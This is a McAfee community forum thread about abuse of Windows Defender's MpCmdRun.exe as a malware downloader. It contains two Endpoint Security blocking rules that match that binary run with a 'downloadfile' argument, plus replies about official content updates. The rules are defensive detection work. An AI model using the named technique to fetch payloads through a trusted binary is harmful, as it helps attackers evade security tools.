cancel
Showing results for 
Show  only  | Search instead for 
Did you mean: 
Reliable Contributor
Reliable Contributor
Report Inappropriate Content
Message 1 of 4

Windows Defender = Malware Downloader

The latest version of Windows Defender can apparently be used for malware downloading as detailed at https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-downloa...

The following rules *should* block it.  The first will work on 10.6 or 10.7 by blocking the loading of DLLs into the abused process.  The second will block the execution, but only works in 10.7.  The second may also block logging by EDR tools as it prohibits the full execution rather than just the activity.    Test for yourself of course. 🙂

10:6/7:

Rule {
Process {
Include OBJECT_NAME { -v "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\*\\mpcmdrun.exe" }
Include PROCESS_CMD_LINE { -v "*downloadfile*" }
}
Target {
Match SECTION {
Include OBJECT_NAME { -v "**" }
Include -access "CREATE"
}
}
}

 

10:7 Only:

Rule {
Process {
Include OBJECT_NAME { -v ** }
}
Target {
Match PROCESS {
Include OBJECT_NAME { -v "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\*\\mpcmdrun.exe" }
Include PROCESS_CMD_LINE { -v "*downloadfile*" }
Include -access "CREATE"
}
}
}

 

 

 

3 Replies
McAfee Employee
McAfee Employee
Report Inappropriate Content
Message 2 of 4

Re: Windows Defender = Malware Downloader

Hi @Daveb3d 

Thanks for the information. Kindly let me know if there is any specific question to McAfee on this topic.

Reliable Contributor
Reliable Contributor
Report Inappropriate Content
Message 3 of 4

Re: Windows Defender = Malware Downloader

Thank you for asking Mcafee now it goes into a slight better way. The customer does share information and Mcafee thanks him.

Question:

With what AMCORE or McAfee Threat Intelligence Exchange (TIE) and Adaptive Threat Protection (ATP) Rule Content Update

will reflect the update Mcafee customer will get when? Tonight?  This exploit is on all Endpoints if we understand it right.

Greetings from Switzerland

Reliable Contributor
Reliable Contributor
Report Inappropriate Content
Message 4 of 4

Re: Windows Defender = Malware Downloader

I have a sr in for this and a couple of other items to get JTI content.   I would expect it before too long.   

You Deserve an Award
Don't forget, when your helpful posts earn a kudos or get accepted as a solution you can unlock perks and badges. Those aren't the only badges, either. How many can you collect? Click here to learn more.

Community Help Hub

    New to the forums or need help finding your way around the forums? There's a whole hub of community resources to help you.

  • Find Forum FAQs
  • Learn How to Earn Badges
  • Ask for Help
Go to Community Help

Join the Community

    Thousands of customers use the McAfee Community for peer-to-peer and expert product support. Enjoy these benefits with a free membership:

  • Get helpful solutions from McAfee experts.
  • Stay connected to product conversations that matter to you.
  • Participate in product groups led by McAfee employees.
Join the Community
Join the Community